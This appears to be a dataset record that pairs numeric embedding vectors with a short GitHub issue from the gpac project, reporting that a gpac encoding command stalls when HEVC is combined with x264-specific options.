0.008609910495579243, -0.021662209182977676, -0.007321024313569069, -0.020221032202243805, -0.0169969592243433, -0.007447312586009502, 0.0057647028006613255, 0.02736748196184635, -0.014575189910829067, -0.024054262787103653, 0.022880522534251213, -0.0013947461266070604, -0.02903151884675026, 0.006893871817737818, 0.009531074203550816, 0.004498102702200413, 0.010957392863929272, -0.007529029157012701, 0.0023214814718812704, -0.011878556571900845, 0.002384625840932131, 0.005151832010596991, -0.003164643654599786, -0.00473210820928216, 0.02010217308998108, 0.03574709966778755, -0.006578150205314159, -0.0073395962826907635, -0.019017577171325684, 0.011276829056441784, 0.0024811995681375265, -0.00028391717933118343, 0.005983850918710232, -0.011358545161783695, -0.005664415191859007, -0.009055634960532188, 0.018244987353682518, -0.011752268299460411, 0.013646597042679787, 0.010801389813423157, -0.01242828369140625, 0.020013028755784035, 0.011135682463645935, -0.0026966328732669353, -0.01754668541252613, -0.0156003562733531, 0.014486044645309448, -0.028452077880501747, 0.007941324263811111, -0.026951471343636513, 0.013193444348871708, -0.022390225902199745, -0.008661911822855473, -0.007172449491918087, -0.0004102058010175824, -0.0028600653167814016, 0.01741296797990799, -0.004713536240160465, -0.011328830383718014, -0.01603122241795063, 0.0019166151760146022, 0.027664631605148315, -0.005961564835160971, -0.007009017281234264, -0.002367911161854863, -0.004590962082147598, -0.010571097955107689, -0.002837779000401497, -0.016283800825476646, 0.017160391435027122, 0.0014049606397747993, 0.017353538423776627, 0.007733319420367479, -0.009077921509742737, 0.018943289294838905, 0.006106425076723099, -0.0025443437043577433, 0.017175249755382538, 0.0073878830298781395, -0.011432832106947899, 0.019210724160075188, 0.02582230418920517, -0.009048206731677055, -0.029358385130763054, 0.001838613417930901, -0.01647694781422615, 0.0020503324922174215, -0.011105967685580254, 0.012108847498893738, 0.01010308787226677, -0.01778440549969673, -0.01686324179172516, 0.00031873941770754755, -0.01018480397760868, -0.02068161405622959, -0.0025759160052984953, 0.0017838263884186745, -0.0007052660803310573, 0.027902351692318916, -0.004030092153698206, -0.004947541281580925, 0.011826555244624615, -0.001257314463146031, -0.001395674655213952, 0.030903562903404236, -0.006905014626681805, 0.025049714371562004, 0.007046160753816366, -0.003552795387804508, -0.012472855858504772, 0.024871423840522766, 0.019909026101231575, 0.004056092351675034, -0.01916615106165409, 0.02078561671078205, 0.005916992202401161, -0.019225582480430603, -0.006425860803574324, -0.002795063890516758, -0.018660997971892357, -0.02326681651175022, -0.005920706316828728, -0.0036605121567845345, 0.014419185929000378, -0.004152666311711073, -0.01796269603073597, 0.03443964198231697, -0.014382042922079563, -0.019002718850970268, -0.009092778898775578, -0.021781068295240402, 0.017457541078329086, -0.009471644647419453, -0.014315184205770493, -0.00010185500286752358, -0.003747799899429083, 0.006919872015714645, 0.00048054667422547936, -0.0022267650347203016, -0.01869071274995804, -0.009909940883517265, 0.003170215291902423, -0.017294108867645264, -0.008372191339731216, 0.0029510674066841602, 0.007659032009541988, -0.017843835055828094, -0.008810486644506454, 0.009924798272550106, 0.008409334346652031, 0.0033856485970318317, 0.007822464220225811, 0.002512771636247635, 0.004754394292831421, -0.002919495105743408, 0.017903266474604607, 0.027872636914253235, -0.0019036148441955447, -0.001103168004192412, -0.011157969012856483, -0.003745942609384656, -0.0038815170992165804, -0.011648265644907951, -0.010311092250049114, -0.001724396483041346, -0.003643797477707267, 0.002893494674935937, -0.009174495004117489, -0.004702392965555191, 0.0034673649352043867, 0.0052521200850605965, -0.006496434099972248, 0.022657660767436028, 0.009612791240215302, 0.006793583743274212, -0.008305332623422146, 0.007963609881699085, -0.014248325489461422, 0.007480741944164038, 0.012294566258788109, 0.00848362222313881, -0.0009457715786993504, 0.02023589052259922, -0.01806669868528843, -0.02971496433019638, 0.006225285120308399, -0.029566388577222824, -0.011009394191205502, -0.00942707248032093, -0.0027040618006139994, -0.0016324658645316958, 0.016387803480029106, -0.0062921433709561825, -0.020072458311915398, 0.0026836327742785215, 0.025837160646915436, -0.011484833434224129, -0.01146254688501358, -0.015058058314025402, -0.005047829356044531, 0.021706780418753624, 0.025554869323968887, -0.01582321897149086, 0.01109853945672512, -0.016462089493870735, -0.013156300410628319, -0.01961187645792961, 0.008595053106546402, -0.00277463486418128, 0.0026000593788921833, -0.005326407495886087, -0.007829893380403519, -0.009865367785096169, -0.01882443018257618, -0.007146448828279972, -0.0021004765294492245, 0.008030468598008156, -0.001456033205613494, 0.0001905936369439587, 0.009642506018280983, 0.007517885882407427, -0.012963153421878815, 0.019299868494272232, -0.01658095046877861, 0.00774817680940032, 0.01872042752802372, -0.018675854429602623, -0.002873065648600459, 0.008855058811604977, -0.008127043023705482, 0.0030476409010589123, 0.006596722174435854, -0.02423255331814289, 0.010712244547903538, 0.02809549868106842, -0.019225582480430603, -0.000018194612493971363, -0.01334201917052269, 0.013706027530133724, -0.01830441690981388, 0.007725890725851059, 0.017011817544698715, -0.012896294705569744, -0.009100208058953285, 0.008060184307396412, -0.012933437712490559, 0.0055678412318229675, -0.005411837715655565, -0.02023589052259922, 0.006310715340077877, -0.025079429149627686, 0.0032500741071999073, -0.004264097195118666, 0.00346922199241817, 0.008089899085462093, 0.0025239146780222654, 0.029388099908828735, 0.003955804742872715, -0.0020484754350036383, -0.009597932919859886, 0.010028799995779991, 0.024633705615997314, -0.010801389813423157, 0.011573978699743748, -0.012019703164696693, 0.013297446072101593, -0.011321401223540306, 0.0019574733451008797, -0.0015461067669093609, -0.0037106561940163374, -0.013297446072101593, -0.03051726706326008, -0.0028767799958586693, -0.011373402550816536, 0.010474524460732937, 0.010273948311805725, -0.0009406643221154809, -0.00999908521771431, -0.001257314463146031, -0.011573978699743748, 0.006050709635019302, -0.01592721976339817, 0.008357333950698376, 0.02133534476161003, 0.011351116001605988, -0.0043420991860330105, 0.014500902034342289, -0.010660243220627308, -0.010415094904601574, 0.010229376144707203, -0.01589750498533249, 0.0032890751026570797, 0.010838532820343971, -0.009850510396063328, -0.019522732123732567, -0.013936318457126617, 0.018393563106656075, -0.0008426978019997478, -0.019938740879297256, 0.006611579563468695, -0.0017893980257213116, 0.006871585268527269, -0.012153420597314835, 0.012762577272951603, -0.013587167486548424, -0.0021970500238239765, 0.010429952293634415, 0.017769549041986465, -0.0115516921505332, -0.0032835034653544426, 0.004910397808998823, 0.006202998571097851, 0.02402454800903797, 0.01484262477606535, -0.008817915804684162, 0.026357172057032585, 0.022360511124134064, 0.007384168449789286, -0.019493015483021736, -0.003302075434476137, -0.02065189927816391, 0.01806669868528843, 0.0024756279308348894, -0.006864156574010849, -0.027218906208872795, -0.027144620195031166, -0.002167335245758295, -0.010400237515568733, -0.0021209055557847023, 0.007068446837365627, -0.027768634259700775, -0.017011817544698715, 0.007064732722938061, -0.008297903463244438, -0.010801389813423157, -0.008342476561665535, -0.013044869527220726, -0.002566630020737648, 0.007933895103633404, -0.0007126948330551386, -0.020815331488847733, -0.010400237515568733, -0.00468010688200593, -0.0002646489010658115, 0.006013565696775913, 0.005478696431964636, 0.0009123422205448151, 0.007659032009541988, 0.019285012036561966, -0.0077778915874660015, -0.021528491750359535, 0.005006971303373575, -0.009404785931110382, 0.00848362222313881, -0.014322612434625626, -0.0005525125889107585, -0.0007303380989469588, 0.02261308766901493, 0.022984525188803673, -0.0037050845567137003, -0.002562915673479438, 0.0056904153898358345, 0.00017353074508719146, -0.0037868006620556116, -0.0022583373356610537, -0.002789492253214121, -0.022449655458331108, 0.013453450053930283, 0.004427529405802488, -0.018883859738707542, -0.00613613985478878, 0.01710096187889576, 0.016774097457528114, -0.0015544639900326729, -0.0034135065507143736, -0.022910237312316895, 0.008208759129047394, -0.0046986788511276245, 0.004089521709829569, -0.004969827830791473, -0.01244314108043909, -0.0010214518988505006, -0.015451781451702118, -0.023563966155052185, -0.0018943289760500193, -0.00040509854443371296, -0.012249994091689587, 0.0015748931327834725, 0.005029257852584124, 0.004902969114482403, -0.02864522486925125, -0.00543783837929368, 0.044631876051425934, -0.023638254031538963, -0.025970878079533577, -0.014352327212691307, 0.00468010688200593, 0.01411460805684328, -0.0015303206164389849, 0.020399322733283043, 0.012420854531228542, 0.017739834263920784, 0.010043657384812832, 0.012926009483635426, -0.01568950153887272, -0.013007725588977337, 0.02057761326432228, -0.004286383744329214, -0.004264097195118666, -0.004420100711286068, 0.007113019470125437, -0.005868705455213785, -0.019745593890547752, -0.014382042922079563, 0.013044869527220726, 0.003374505555257201, -0.0033243615180253983, 0.012472855858504772, -0.009820795617997646, 0.018542136996984482, 0.0024811995681375265, 0.03723284974694252, -0.004810109734535217, 0.023058811202645302, 0.010459667071700096, -0.004642962943762541, -0.005638414528220892, -0.014307755045592785, 0.00936021376401186, -0.0031330715864896774, 0.007592173293232918, -0.008290475234389305, -0.01647694781422615, 0.0060247089713811874, 0.024589132517576218, 0.005448981653898954, 0.010816247202455997, 0.00531897833570838, 0.0017531828489154577, -0.01023680530488491, -0.030294405296444893, 0.019002718850970268, 0.011009394191205502, 0.006500148214399815, -0.00775560550391674, -0.0024217695463448763, -0.017814120277762413, 0.0008928417810238898, 0.007547600660473108, -0.03791629523038864, 0.007993325591087341, 0.0019816167186945677, 0.01623922772705555, 0.0017633973620831966, 0.02203364484012127, -0.010682529769837856, 0.011915700510144234, 0.002362339524552226, -0.023831401020288467, 0.00329278944991529, -0.01592721976339817, -0.00144396151881665, -0.0038852314464747906, -0.01848270744085312, 0.018111269921064377, 0.010489381849765778, 0.016417518258094788, 0.010645385831594467, -0.01451575942337513, -0.014419185929000378, 0.015436924062669277, 0.011536834761500359, 0.0029993541538715363, -0.005478696431964636, 0.011611121706664562, -0.007101876195520163, 0.013906602747738361, 0.012405997142195702, -0.012896294705569744, 0.004824967123568058, -0.01671466790139675, 0.0028823514003306627, -0.006139854434877634, 0.01475347951054573, -0.007829893380403519, -0.017843835055828094, -0.019195865839719772, 0.005538126453757286, -0.013668883591890335, 0.017606116831302643, -0.0002398090437054634, 0.01013280265033245, -0.010266520082950592, -0.019002718850970268, 0.00019454016000963748, -0.018126128241419792, -0.002042903797701001, -0.029670391231775284, 0.012101419270038605, -0.011863699182868004, -0.004197238478809595, 0.0011319543700665236, 0.0022676230873912573, -0.011455118656158447, 0.011254542507231236, 0.006875299848616123, -0.0006300500826910138, -0.0013446020893752575, -0.004587247502058744, -0.006659866310656071, 0.010608241893351078, -0.020072458311915398, -0.010303664021193981, 0.016075795516371727, 0.007228164933621883, -0.028258930891752243, -0.0032315023709088564, -0.02806578390300274, -0.014389471150934696, -0.010400237515568733, 0.01018480397760868, 0.01720496453344822, -0.004594676196575165, 0.007621888071298599, -0.0008793771849013865, 0.003749656956642866, 0.015704357996582985, 0.0020243318285793066, 0.00265948916785419, -0.0048695397563278675, 0.0029306383803486824, -0.008476193062961102, -0.0011180255096405745, -0.010259090922772884, -0.0017151106148958206, 0.0015925363404676318, 0.02224165014922619, 0.010697387158870697, -0.008899631910026073, 0.021662209182977676, -0.007711033336818218, -0.007562458515167236, 0.0029584961012005806, 0.0005223333719186485, 0.00135945959482342, -0.011336258612573147, -0.014560332521796227, 0.0004930826835334301, 0.02822921611368656, -0.027917208150029182, -0.009590504691004753, 0.007985896430909634, 0.0043903859332203865, -0.021424489095807076, -0.004661534912884235, -0.03336990624666214, 0.004854682367295027, 0.01955244690179825, -0.018973004072904587, 0.01848270744085312, 0.021394774317741394, 0.021142195910215378, -0.01236142497509718, 0.002191478619351983, -0.006500148214399815, -0.00422323914244771, 0.01340887788683176, -0.0019964741077274084, 0.018571851775050163, -0.006351573392748833, -0.0009620219352655113, -0.014961483888328075, -0.01242828369140625, -0.006325572729110718, 0.006544720847159624, 0.00491411192342639, -0.02926923893392086, -0.018452992662787437, -0.006570721510797739, 0.0074844565242528915, -0.016952386125922203, -0.0167592391371727, -0.014924340881407261, -0.00994708389043808, 0.01160369347780943, -0.014612333849072456, -0.009679649025201797, 0.0008909846073947847, 0.004160095006227493, 0.0077778915874660015, -0.007725890725851059, 0.015674643218517303, 0.02686232700943947, -0.017368396744132042, 0.04436444118618965, -0.011180255562067032, 0.013059726916253567, 0.0005019042873755097, -0.041868384927511215, 0.00699787400662899, 0.005824132822453976, -0.0071761636063456535, -0.0172346793115139, 0.007867036387324333, -0.017190106213092804, 0.001682609785348177, 0.019879311323165894, -0.001646394724957645, -0.0009629505220800638, 0.010377950966358185, -0.0007790892268531024, -0.00381465838290751, 0.004074664320796728, 0.023979974910616875, -0.0038666597101837397, 0.006269857287406921, -0.022048503160476685, -0.014998627826571465, 0.018987862393260002, 0.0032110733445733786, -0.0016194655327126384, -0.007194735575467348, -0.01895814761519432, 0.0278874933719635, -0.039936911314725876, -0.0009861653670668602, -0.010585956275463104, 0.02909095026552677, 0.011796840466558933, 0.025109143927693367, -0.0018005410674959421, 0.014419185929000378, 0.019522732123732567, -0.018348990008234978, -0.026178883388638496, -0.023296531289815903, 0.01806669868528843, -0.016818668693304062, -0.007547600660473108, -0.008936774916946888, -0.015020914375782013, -0.010845961980521679, -0.012383711524307728, -0.018497565761208534, -0.0034357926342636347, -0.003370791207998991, 0.006377574056386948, -0.0010000942274928093, 0.027664631605148315, 0.019522732123732567, 0.012353995814919472, -0.024173123762011528, -0.007837321609258652, -0.0018358275992795825, -0.0023864831309765577, -0.008349904790520668, -0.011945415288209915, -0.013490593992173672, 0.01327516045421362, 0.02513885870575905, 0.013297446072101593, 0.029432671144604683, -0.0030532125383615494, 0.016283800825476646, 0.031527575105428696, -0.0025592013262212276, 0.001959330402314663, -0.0007052660803310573, 0.00624014250934124, -0.00739531172439456, -0.01415175199508667, 0.011900843121111393, -0.0010502382647246122, 0.00381465838290751, -0.001608322374522686, 0.01411460805684328, -0.005393265746533871, 0.020830189809203148, 0.016120368614792824, -0.0038406590465456247, 0.006448147352784872, 0.01592721976339817, -0.025703443214297295, -0.015347778797149658, 0.01340887788683176, 0.010868247598409653, -0.006678438279777765, 0.013780314475297928, -0.010259090922772884, 0.00289535173214972, 0.0045612468384206295, 0.0011505262227728963, -0.0030383551493287086, -0.0018915431573987007, 0.014694049954414368, -0.0021506205666810274, -0.0014848195714876056, -0.010764245875179768, 0.008751057088375092, 0.029209809377789497, -0.014203752391040325, -0.00624014250934124, -0.015191774815320969, -0.008156757801771164, 0.02499028481543064, -0.004368099849671125, 0.006214141845703125, -0.011388259939849377, 0.005148117430508137, -0.020607328042387962, -0.0202656053006649, -0.0014996770769357681, -0.008045326918363571, -0.019433585926890373, 0.00045965335448272526, 0.002995639806613326, -0.011960272677242756, -0.006789869163185358, 0.006853013765066862, 0.009850510396063328, 0.02861551009118557, 0.002115333918482065, 0.008936774916946888, -0.0024607705418020487, 0.00848362222313881, -0.02995268441736698, -0.005222404841333628, -0.0024533416144549847, 0.004338384605944157, 0.003088498953729868, -0.0129482951015234, 0.014916911721229553, 0.002466341946274042, 0.01109853945672512, -0.026624606922268867, 0.00433467049151659, 0.0169969592243433, -0.01924043893814087, -0.011224827729165554, -0.020087314769625664, 0.0024050548672676086, 0.017115818336606026, -0.0011338115436956286, 0.006158426403999329, -0.027382338419556618, -0.02406912110745907, -0.011239685118198395, 0.004498102702200413, 0.0031850726809352636, -0.01950787380337715, -0.008691626600921154, -0.0020726188085973263, -0.023742256686091423, -0.0035100800450891256, 0.0015154631109908223, 0.015318064019083977, 0.0003150250413455069, 0.034320782870054245, -0.007614459376782179, -0.0078596081584692, -0.001253599999472499, 0.006689581088721752, 0.012405997142195702, 0.003822087310254574, 0.02427712455391884, -0.003794229356572032, 0.007205878850072622, -0.002263908740133047, 0.011529405601322651, 0.001573964487761259, -0.005140688735991716, 0.009516216814517975, 0.011833984404802322, 0.01237628236413002, -0.0172346793115139, -0.012079132720828056, -0.008082469925284386, -0.010764245875179768, 0.0078596081584692, 0.006663580425083637, -0.0022026216611266136, -0.009575647301971912, -0.0020299034658819437, 0.01741296797990799, 0.006752725690603256, -0.00306806992739439, 0.026327457278966904, 0.003907517530024052, 0.010437381453812122, 0.003914946690201759, -0.009419643320143223, -0.004676392301917076, 0.014560332521796227, -0.00538583705201745, -0.006548434961587191, 0.00947907380759716, -0.038391731679439545, -0.0017828978598117828, 0.000898413360118866, -0.004828681703656912, -0.01765068806707859, 0.012279708869755268, 0.008914489299058914, -0.006288429256528616, 0.005604985170066357, 0.005341264884918928, -0.012658574618399143, -0.001115239690989256, -0.004312383942306042, 0.010214518755674362, 0.012264851480722427, 0.0032556457445025444, 0.02548058144748211, 0.0032147876918315887, 0.015407208353281021, -0.004375528544187546, 0.0029306383803486824, 0.02054789662361145, -0.014887196943163872, -0.004527817480266094, 0.00930821243673563, -0.018007267266511917, -0.019255297258496284, -0.011165397241711617, -0.012725433334708214, -0.00837961956858635, -0.004174952395260334, 0.01185627095401287, 0.021365059539675713, -0.01377288531512022, 0.007536457851529121, 0.002863779664039612, 0.0032519313972443342, -0.011989987455308437, 0.0022731947246938944, 0.01022194791585207, -0.03378591313958168, -0.013156300410628319, 0.053932659327983856, -0.009991656988859177, 0.0068455846048891544, 0.02237536758184433, -0.004836110398173332, -0.008409334346652031, 0.011596264317631721, -0.005244690924882889, -0.009820795617997646, 0.013869459740817547, -0.007209592964500189, -0.015882648527622223, 0.005133260041475296, 0.009761366061866283, 0.014946626499295235, -0.00018629890109878033, -0.008647054433822632, -0.010987107641994953, -0.01606093719601631, -0.0073135956190526485, -0.00548241101205349, 0.02320738695561886, 0.031765297055244446, 0.006117568351328373, -0.02650574781000614, 0.022776519879698753, 0.005140688735991716, 0.01109853945672512, 0.023088527843356133, 0.002709633205085993, 0.023355960845947266, -0.007963609881699085, 0.0021729066502302885, -0.013260303065180779, 0.0046986788511276245, 0.021261056885123253, 0.011440261267125607, 0.020637042820453644, -0.013297446072101593, -0.008023040369153023, 0.01456776075065136, -0.01389174535870552, -0.009174495004117489, -0.003948376048356295, 0.003797943703830242, -0.004810109734535217, 0.024381127208471298, 0.025970878079533577, 0.005133260041475296, -0.010318521410226822, 0.025450866669416428, 0.0030847846064716578, 0.008595053106546402, -0.00254620099440217, 0.016625521704554558, -0.002611202420666814, 0.001044666743837297, -0.016937529668211937, -0.007659032009541988, 0.011128254234790802, 0.009404785931110382, -0.02430684119462967, 0.001345530734397471, -0.008409334346652031, -0.014382042922079563, 0.003671655198559165, -0.008840201422572136, 0.004813824314624071, 0.013512879610061646, 0.029402956366539, 0.0055455551482737064, -0.01375802792608738, -0.01151454821228981, -0.0014272468397393823, 0.0034525073133409023, -0.012740290723741055, 0.010987107641994953, -0.003721799235790968, 0.01678895391523838, -0.004364385269582272, -0.020221032202243805, -0.0035305090714246035, -0.002616774057969451, 0.00467267818748951, -0.014872339554131031, -0.013884317129850388, -0.010125373490154743, -0.008119613863527775, -0.0053746942430734634, 0.004665249492973089, 0.01833413355052471, 0.0030476409010589123, 0.0031349286437034607, 0.0011709552491083741, -0.018363848328590393, -0.00370137020945549, -0.013245444744825363, -0.011410546489059925, -0.004004091490060091, 0.01230942364782095, 0.0066970097832381725, 0.0065038627944886684, -0.003523080376908183, 0.0028210643213242292, 0.0024347698781639338, 0.013683740980923176, -0.000838054867926985, 0.015139774419367313, -0.020770760253071785, 0.030071543529629707, 0.004360671155154705, -0.02123134210705757, 0.01227227970957756, -0.0009870940120890737, 0.01751697063446045, 0.04427529498934746, 0.008751057088375092, -0.00705730402842164, -0.012064275331795216, 0.015117487870156765, -0.006362716667354107, -0.016536377370357513, 0.020696472376585007, 0.00028043496422469616, 0.004249239806085825, 0.00032407883554697037, -0.0025276290252804756, 0.011105967685580254, 0.021587921306490898, -0.005099830683320761, 0.0013260302366688848, -0.019314726814627647, 0.0014393185265362263, 0.004256668500602245, 0.010266520082950592, 0.03253788501024246, 0.00008415370393777266, 0.018527280539274216, 0.009560789912939072, 0.0077927494421601295, -0.013111728243529797, 0.03981805220246315, -0.028986947610974312, 0.014300326816737652, -0.029878396540880203, 0.00780760683119297, 0.002741205506026745, 0.0019203295232728124, -0.006663580425083637, -0.010259090922772884, 0.0010205232538282871, 0.00021067445049993694, 0.0063330018892884254, -0.01785869337618351, 0.0026316314470022917, -0.0016872527776286006, -0.0009555218275636435, 0.014441472478210926, -0.009724222123622894, 0.009471644647419453, 0.006455576047301292, 0.0185124222189188, -0.01692267134785652, 0.02616402506828308, -0.004193524364382029, 0.008468764834105968, 0.013037440367043018, -0.01161855086684227, 0.017041532322764397, 0.006793583743274212, -0.00791160948574543, -0.0007368382648564875, 0.005578984506428242, -0.005772131960839033, 0.019864453002810478, 0.0117894122377038, 0.028868086636066437, -0.00289163738489151, 0.014864910393953323, 0.028080640360713005, 0.02412855066359043, 0.006492719519883394, 0.007673889398574829, -0.013200872577726841, 0.03265674412250519, -0.009649934247136116, -0.0027616345323622227, -0.004999542608857155, 0.01989416778087616, -0.0011588835623115301, 0.006849299184978008, 0.0032110733445733786, -0.0014421043451875448, 0.014426615089178085, 0.0017271823016926646, 0.0154814962297678, 0.007829893380403519, 0.008936774916946888, 0.005289263557642698, 0.014760908670723438, 0.020176460966467857, -0.03164643794298172, -0.009434500709176064, 0.018155843019485474 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
When putting some wrong parameters (hevc with avc options), my command-line stalled: ``` gpac -i avgen:dur=2 @ enc:gfloc:c=hevc:b=5100k:r=30/1:bf=2:b_strategy=0:fintra=2:profile=high:color_primaries=1:color_trc=1:colorspace=1::x264-params="level=40:no-open-gop=1:scenecut=0" -o hevc.mp4 ```
command-line never exits
https://api.github.com/repos/gpac/gpac/issues/2270/comments
1
2022-09-28T18:55:52
2022-09-29T10:49:00Z
https://github.com/gpac/gpac/issues/2270
1,389,811,561
2,270
false
This is a GitHub Issue repo:gpac owner:gpac Title : command-line never exits Issue date: --- start body --- When putting some wrong parameters (hevc with avc options), my command-line stalled: ``` gpac -i avgen:dur=2 @ enc:gfloc:c=hevc:b=5100k:r=30/1:bf=2:b_strategy=0:fintra=2:profile=high:color_primaries=1:color_trc=1:colorspace=1::x264-params="level=40:no-open-gop=1:scenecut=0" -o hevc.mp4 ``` --- end body ---
423
[ -0.0278173815459013, 0.045281343162059784, -0.015530131757259369, 0.0023968317545950413, 0.026835592463612556, 0.014741724357008934, -0.0313577763736248, 0.05489098280668259, -0.013983068987727165, -0.00900717917829752, -0.025035643950104713, 0.004075916018337011, 0.03263707831501961, 0.005318028852343559, 0.00995921716094017, 0.02961733005940914, -0.020067190751433372, 0.011632722802460194, 0.004351114388555288, -0.018743261694908142, 0.011840981431305408, -0.0266422089189291, -0.011260832659900188, 0.04459706321358681, 0.002264810958877206, -0.010643495246767998, -0.031417276710271835, 0.020706841722130775, -0.02863553911447525, -0.03936085104942322, -0.007274170871824026, 0.02689509466290474, 0.010561679489910603, 0.028412405401468277, 0.04525158926844597, -0.0013481017667800188, 0.04382353276014328, 0.04938700795173645, 0.02225390449166298, 0.02738598920404911, 0.0029137590900063515, -0.018877143040299416, -0.0473044253885746, 0.02979583665728569, -0.030063597485423088, -0.0001735099940560758, -0.0016307382611557841, -0.015306998044252396, 0.012525259517133236, -0.005370093509554863, 0.02216465212404728, -0.015002047643065453, -0.024083605036139488, -0.02348858118057251, -0.0021420870907604694, -0.026121562346816063, 0.050249792635440826, -0.03811129927635193, -0.006102717015892267, 0.05875863879919052, -0.026493452489376068, 0.014131824485957623, -0.04382353276014328, 0.02731161005795002, -0.000017228972865268588, 0.0030773908365517855, 0.013417796231806278, 0.01875813864171505, -0.015121052972972393, 0.0010357140563428402, 0.011045136488974094, -0.03159578517079353, -0.0011491405311971903, 0.012912024743855, 0.029319817200303078, -0.06402460485696793, 0.04108642041683197, 0.00628494331613183, -0.018475500866770744, -0.0007688828627578914, -0.03320235013961792, 0.009565014392137527, -0.043109502643346786, -0.007601434364914894, -0.00871710479259491, -0.029200812801718712, -0.015440878458321095, -0.06949882954359055, -0.03867657482624054, 0.0415029376745224, 0.011402151547372341, 0.021063856780529022, -0.0024024101439863443, 0.005284558515995741, -0.030361110344529152, 0.00686881085857749, -0.03852781653404236, 0.014206202700734138, -0.016482170671224594, -0.046263132244348526, -0.0031796605326235294, -0.052421633154153824, 0.012436006218194962, 0.007497305050492287, -0.008769169449806213, 0.02771325223147869, 0.022209279239177704, -0.00236522126942873, 0.01850525289773941, 0.11519668251276016, -0.004354833159595728, -0.0038230305071920156, 0.024529872462153435, -0.029185937717556953, -0.007039879914373159, 0.0006085052154958248, 0.007303921971470118, -0.008248522877693176, 0.009289815090596676, -0.00012958046863786876, -0.011060012504458427, -0.01758296601474285, -0.014511153101921082, 0.008531159721314907, -0.024544747546315193, 0.03608821704983711, -0.010018720291554928, 0.02225390449166298, -0.013521924614906311, -0.0416814461350441, -0.05459346994757652, -0.010755062103271484, -0.006723773665726185, -0.0023131566122174263, 0.028605788946151733, -0.015961524099111557, -0.02531827986240387, -0.0007038020412437618, -0.015753265470266342, -0.007638623006641865, -0.05893714725971222, -0.05019029229879379, 0.04397228732705116, -0.009654267691075802, -0.01215336937457323, 0.0020714281126856804, 0.0067758383229374886, -0.015827644616365433, -0.013722745701670647, 0.03055449202656746, -0.018044108524918556, -0.020111817866563797, -0.009096432477235794, -0.001821331912651658, 0.018475500866770744, -0.020394453778862953, 0.0011500702239573002, -0.0000517159714945592, -0.022030770778656006, 0.0010078222258016467, -0.036147721111774445, -0.021971268579363823, -0.0022480757907032967, 0.007698125671595335, -0.018222616985440254, -0.023057186976075172, 0.01274839323014021, 0.014704535715281963, -0.02607693523168564, 0.01124595757573843, -0.028248773887753487, 0.0008297798340208828, 0.003421389264985919, 0.018773013725876808, -0.03061399608850479, -0.0287247933447361, 0.028085142374038696, 0.054980237036943436, -0.0287247933447361, 0.024842260405421257, -0.03162553533911705, 0.007988199591636658, -0.007943573407828808, -0.0010189790045842528, 0.06295356154441833, -0.016199534758925438, -0.006069246679544449, -0.029751209542155266, 0.024857135489583015, -0.026002557948231697, 0.006586174014955759, -0.009252626448869705, 0.0045073083601891994, -0.019546544179320335, 0.003956911154091358, 0.013834312558174133, -0.007077069021761417, 0.015634261071681976, -0.041621942073106766, 0.01065837126225233, 0.009847650304436684, -0.033321354538202286, 0.001290458720177412, -0.016541672870516777, -0.015664011240005493, -0.00047973825712688267, -0.007244419772177935, 0.03885507956147194, 0.024202609434723854, -0.028933051973581314, -0.013410357758402824, -0.04111617058515549, 0.017612716183066368, -0.00884354766458273, -0.03228006139397621, -0.007065912242978811, -0.004827133845537901, -0.012041802518069744, -0.015210306271910667, -0.01070299744606018, 0.015440878458321095, 0.004537059459835291, 0.003934597596526146, -0.011179016903042793, -0.03891458362340927, -0.018817640841007233, 0.0045779673382639885, -0.02530340477824211, -0.005273402202874422, 0.023845594376325607, 0.006575017236173153, 0.019576296210289, -0.00005816594057250768, 0.01759784109890461, -0.03867657482624054, -0.013127721846103668, -0.009996406733989716, -0.0020528335589915514, 0.007928697392344475, -0.015797892585396767, 0.0049387007020413876, 0.056081030517816544, 0.009684018790721893, 0.006857654079794884, -0.012852522544562817, 0.04629288241267204, 0.03159578517079353, -0.0006619644118472934, -0.018609382212162018, -0.007653499022126198, -0.032994091510772705, -0.017211075872182846, 0.013001278974115849, -0.02084072306752205, -0.010941007174551487, 0.028680166229605675, 0.02580917440354824, 0.010561679489910603, -0.010427799075841904, -0.03338085860013962, -0.01683918572962284, 0.022447288036346436, -0.03596921265125275, -0.018058985471725464, 0.0035069237928837538, -0.04263348504900932, -0.008181583136320114, 0.0029825589153915644, 0.0018380669644102454, -0.010926132090389729, 0.010122849605977535, 0.005556038580834866, -0.034481652081012726, -0.01436239667236805, -0.0035887397825717926, -0.018237492069602013, -0.031417276710271835, 0.001619581482373178, 0.01244344376027584, -0.0020137850660830736, -0.02530340477824211, -0.01108232606202364, -0.015455753542482853, 0.010747624561190605, -0.025586040690541267, -0.0004960084334015846, 0.04483507201075554, -0.003105282550677657, -0.022596044465899467, 0.02787688374519348, 0.03147678077220917, 0.05587277188897133, 0.005440752487629652, 0.027609122917056084, -0.002069568494334817, 0.0021104763727635145, -0.011305459775030613, 0.014176451601088047, 0.01203436404466629, 0.010435236617922783, -0.0236522126942873, 0.046203628182411194, 0.04263348504900932, -0.0198440570384264, -0.05968092754483223, 0.013395482674241066, -0.0034901888575404882, 0.040045127272605896, 0.016452418640255928, 0.006560141686350107, 0.04659039527177811, -0.044359054416418076, -0.008769169449806213, 0.002474928740411997, -0.000023126916858018376, 0.008255960419774055, 0.015217743813991547, -0.015292122028768063, -0.0416814461350441, 0.023057186976075172, 0.03168503940105438, 0.005518849473446608, -0.029349569231271744, -0.01625903695821762, 0.002207167912274599, -0.023637335747480392, -0.03442215174436569, -0.008211334235966206, -0.05486123263835907, 0.01169966347515583, 0.008501408621668816, -0.027192605659365654, 0.003997819032520056, -0.011052574962377548, 0.021703507751226425, -0.06390559673309326, -0.010264167562127113, -0.01926390826702118, 0.04795895144343376, -0.0061250305734574795, -0.011945110745728016, -0.013745059259235859, 0.021599378436803818, -0.007043599151074886, 0.002214605687186122, -0.013172348029911518, -0.011208768002688885, 0.022848930209875107, 0.043317761272192, 0.00826339889317751, 0.0009366982849314809, 0.041443437337875366, 0.03576095402240753, -0.003599896328523755, 0.02307206392288208, 0.004875479731708765, -0.010450112633407116, -0.025511663407087326, -0.0016149329021573067, -0.018951520323753357, 0.03275608271360397, -0.039955876767635345, 0.051915861666202545, 0.030093349516391754, 0.01585739478468895, 0.00040768456528894603, -0.02571992203593254, -0.019368037581443787, -0.008865860290825367, -0.013633492402732372, 0.011431902647018433, -0.002050973940640688, -0.026954596862196922, 0.03701050579547882, 0.0010849894024431705, -0.0034306864254176617, -0.000657780678011477, -0.017404457554221153, -0.03942035511136055, 0.00010749948705779389, -0.04795895144343376, 0.033499862998723984, 0.04177070036530495, -0.044626813381910324, 